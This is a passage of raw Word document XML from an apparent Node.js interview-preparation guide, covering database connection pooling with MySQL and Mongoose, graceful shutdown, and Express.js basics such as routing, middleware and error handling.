    <w:p w14:paraId="7A6B70B2" w14:textId="77777777" w:rsidR="004B60F6" w:rsidRPr="00DA2F32" w:rsidRDefault="004B60F6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Using an ORM (e.g., Sequelize for MySQL/PostgreSQL):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EDDB09"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3. Connection Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF8DA03" w14:textId="77777777" w:rsidR="004B60F6" w:rsidRPr="00DA2F32" w:rsidRDefault="004B60F6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Connection Pooling:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Instead of opening and closing connections for every query, use connection pooling to reuse existing connections. This is essential for reducing overhead and improving performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D07497" w14:textId="77777777" w:rsidR="004B60F6" w:rsidRPr="00DA2F32" w:rsidRDefault="004B60F6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>MySQL Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04706A45"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mysql = require('mysql2');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A99814"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703C2E40"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pool = mysql.createPool({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC7382C"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host: 'localhost',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C2D19E"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 'root',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F067E0"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password: 'password',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CDCF2C"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database: 'mydatabase',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639199CF"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waitForConnections: true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C67755"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connectionLimit: 10,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDCEF9D"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queueLimit: 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E13DEA"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11118B9"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7EE151A"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module.exports = pool;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AC3A25" w14:textId="77777777" w:rsidR="004B60F6" w:rsidRPr="00DA2F32" w:rsidRDefault="004B60F6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>MongoDB with mongoose:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6D9BF7"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mongoose = require('mongoose');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14055E8D"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2D08F89A"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connectToDatabase() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C35FA52"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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD0F57A"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await mongoose.connect('mongodb://localhost:27017/mydatabase', {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6466336B"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useNewUrlParser: true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCF7181"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useUnifiedTopology: true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14422F58"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A1EEF67"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console.log('Connected to MongoDB');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD3113F"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(error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4954A8"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connecting to MongoDB:', error);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B41A8C4"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0F44B3B"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6F70315"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D3DFEA5"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module.exports = connectToDatabase;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5EB464"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4. Handling Connection Errors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423B3FDD" w14:textId="77777777" w:rsidR="004B60F6" w:rsidRPr="00DA2F32" w:rsidRDefault="004B60F6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Always handle connection errors to ensure your application fails gracefully if the database is unreachable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760DCB89" w14:textId="77777777" w:rsidR="004B60F6" w:rsidRPr="00DA2F32" w:rsidRDefault="004B60F6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Listen for error and disconnect events for proper cleanup or retries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9B2338"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5. Graceful Shutdown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A2E6A7" w14:textId="77777777" w:rsidR="004B60F6" w:rsidRPr="00DA2F32" w:rsidRDefault="004B60F6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>On application shutdown, close the database connections properly to avoid leaving open connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7736D6" w14:textId="77777777" w:rsidR="004B60F6" w:rsidRPr="00DA2F32" w:rsidRDefault="004B60F6" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example with Mongoose:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48812D7C"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process.on('SIGINT', async () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBAC1AC"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await mongoose.connection.close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA4A2DF"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console.log('MongoDB connection closed');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3009387A"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process.exit(0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC876B6"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617F0E83" w14:textId="77777777" w:rsidR="004B60F6" w:rsidRPr="00DA2F32" w:rsidRDefault="004B60F6" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example with Sequelize:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DFD633"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process.on('SIGINT', async () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B292344"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await sequelize.close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343ABF25"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console.log('Database connection closed');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC3C74E"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process.exit(0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC1E583" w14:textId="77777777" w:rsidR="004B60F6" w:rsidRPr="00DA2F32" w:rsidRDefault="004B60F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628E94D3"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6. Environment Variables for Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F05260" w14:textId="77777777" w:rsidR="004B60F6" w:rsidRPr="00DA2F32" w:rsidRDefault="004B60F6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Store sensitive information like database credentials in environment variables and use a package like dotenv to load them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD453D9" w14:textId="77777777" w:rsidR="004B60F6" w:rsidRPr="00DA2F32" w:rsidRDefault="004B60F6" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>7. Connection Best Practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A19B1A" w14:textId="77777777" w:rsidR="004B60F6" w:rsidRPr="00DA2F32" w:rsidRDefault="004B60F6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use Connection Pooling:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Always prefer connection pooling for better resource management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC8043E" w14:textId="77777777" w:rsidR="004B60F6" w:rsidRPr="00DA2F32" w:rsidRDefault="004B60F6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Monitor Connections:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Implement monitoring for connection usage, errors, and performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4657A985" w14:textId="77777777" w:rsidR="004B60F6" w:rsidRPr="00DA2F32" w:rsidRDefault="004B60F6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Secure Connections:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use SSL/TLS for securing connections to the database, especially in production environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18053B9B" w14:textId="77777777" w:rsidR="004B60F6" w:rsidRPr="00DA2F32" w:rsidRDefault="004B60F6" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41CE448B"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35" w:name="_Toc178383218"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Q34. What is the purpose of the Express.js framework in Node.js?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w14:paraId="1B1AB760"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1. What is Express.js, and why is it used?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF99578" w14:textId="77777777" w:rsidR="009A4FD1" w:rsidRPr="00DA2F32" w:rsidRDefault="009A4FD1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="170"/>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Express.js is a lightweight web application framework for Node.js. It provides tools and utilities for building web applications, RESTful APIs, and handling HTTP requests and responses efficiently. It simplifies the process of setting up a server, routing, and middleware integration, making it a popular choice for building scalable web applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E81442"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2. How do you create a basic server using Express.js?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795DDE99" w14:textId="77777777" w:rsidR="009A4FD1" w:rsidRPr="00DA2F32" w:rsidRDefault="009A4FD1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="171"/>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basic server can be created in Express.js using the following code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63964D61"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const express = require('express');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182379E7"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24086079"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7069B55B"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 (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225F5521"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res.send('Hello World');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E518A36"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9300E6F"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23A6A9D8"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app.listen(3000, () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCE7E10"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console.log('Server is running on http://localhost:3000');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC7074D"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D6FE67F" w14:textId="77777777" w:rsidR="009A4FD1" w:rsidRPr="00DA2F32" w:rsidRDefault="009A4FD1" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>This sets up a server that listens on port 3000 and responds with "Hello World" for GET requests to the root URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EA6197"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3. What are middlewares in Express.js?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AEB453" w14:textId="77777777" w:rsidR="009A4FD1" w:rsidRPr="00DA2F32" w:rsidRDefault="009A4FD1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="172"/>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Middleware functions are functions that have access to the request object (req), response object (res), and the next middleware function in the application’s request-response cycle. Middleware can perform tasks like logging, authentication, parsing request bodies, handling errors, and more. Middleware functions can be global, route-specific, or applied to certain HTTP methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53489F28"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4. How do you handle errors in Express.js?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240E948E" w14:textId="77777777" w:rsidR="009A4FD1" w:rsidRPr="00DA2F32" w:rsidRDefault="009A4FD1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="173"/>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Error handling in Express.js is typically done using error-handling middleware. An error-handling middleware function is defined with four arguments: err, req, res, and next.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B04FA01"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18F7D1AF"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console.error(err.stack);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7633DE78"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res.status(500).send('Something went wrong!');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEA8EC4"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773C1B4" w14:textId="77777777" w:rsidR="009A4FD1" w:rsidRPr="00DA2F32" w:rsidRDefault="009A4FD1" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>This middleware catches errors that occur during request processing and sends a 500 status code with an error message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDB01B0"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5. Explain the concept of routing in Express.js.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DC9AF8" w14:textId="77777777" w:rsidR="009A4FD1" w:rsidRPr="00DA2F32" w:rsidRDefault="009A4FD1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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Routing in Express.js refers to defining the endpoints (URIs) and how they respond to client requests. Each route can handle a specific HTTP method (GET, POST, PUT, DELETE, etc.) and can be associated with one or more callback functions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D03F095"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app.get('/user', (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B31689B"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res.send('GET request to /user');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1186F268"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10E2912"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74A4E3D"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app.post('/user', (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A84491"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res.send('POST request to /user');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5B3BD1"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912878B" w14:textId="77777777" w:rsidR="009A4FD1" w:rsidRPr="00DA2F32" w:rsidRDefault="009A4FD1" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Routing can also be organized into route modules for better maintainability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E6D40D"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6. What is the purpose of next() in Express.js middleware?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6061ABC5" w14:textId="77777777" w:rsidR="009A4FD1" w:rsidRPr="00DA2F32" w:rsidRDefault="009A4FD1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="175"/>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next() function is used to pass control to the next middleware function in the stack. If next() is not called, the request will be left hanging, and the response will not be sent. It's essential for ensuring that the request continues through the middleware chain or reaches the final route handler.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E07957C"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7. How do you handle different HTTP methods in Express.js?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FE859F" w14:textId="77777777" w:rsidR="009A4FD1" w:rsidRPr="00DA2F32" w:rsidRDefault="009A4FD1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="176"/>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Express.js provides methods for handling different HTTP methods (e.g., get, post, put, delete) directly on the app or router object. Each method corresponds to a specific HTTP request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D17741"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app.get('/example', (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D8DA79"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res.send('GET request');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52420FF9"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B6BB041"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7D557D8F"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app.post('/example', (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BECFE2"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res.send('POST request');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A39F188"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BF3E5D7"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8. What are route parameters, and how do you use them in Express.js?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C55779" w14:textId="77777777" w:rsidR="009A4FD1" w:rsidRPr="00DA2F32" w:rsidRDefault="009A4FD1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="177"/>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Route parameters are named segments in the URL that are used to capture values specified at certain positions in the URL. They are denoted with a colon :.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBEDBC7"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app.get('/user/:id', (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78022793"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res.send(`User ID: ${req.params.id}`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B51AC8"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FD11F2F" w14:textId="77777777" w:rsidR="009A4FD1" w:rsidRPr="00DA2F32" w:rsidRDefault="009A4FD1" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Here, :id is a route parameter, and its value can be accessed using req.params.id.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A60E36"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9. How can you handle form data or JSON data in Express.js?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517C1A0A" w14:textId="77777777" w:rsidR="009A4FD1" w:rsidRPr="00DA2F32" w:rsidRDefault="009A4FD1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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To handle form data or JSON data, you need to use built-in middleware like express.urlencoded() and express.json():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C97B2C"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app.use(express.urlencoded({ extended: true }));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A871BBB"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app.use(express.json());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3F991E" w14:textId="77777777" w:rsidR="009A4FD1" w:rsidRPr="00DA2F32" w:rsidRDefault="009A4FD1" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>express.urlencoded() handles URL-encoded data, while express.json() handles JSON data in incoming requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE1F8FA"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10. How do you implement authentication in an Express.js application?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1969EE" w14:textId="77777777" w:rsidR="009A4FD1" w:rsidRPr="00DA2F32" w:rsidRDefault="009A4FD1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
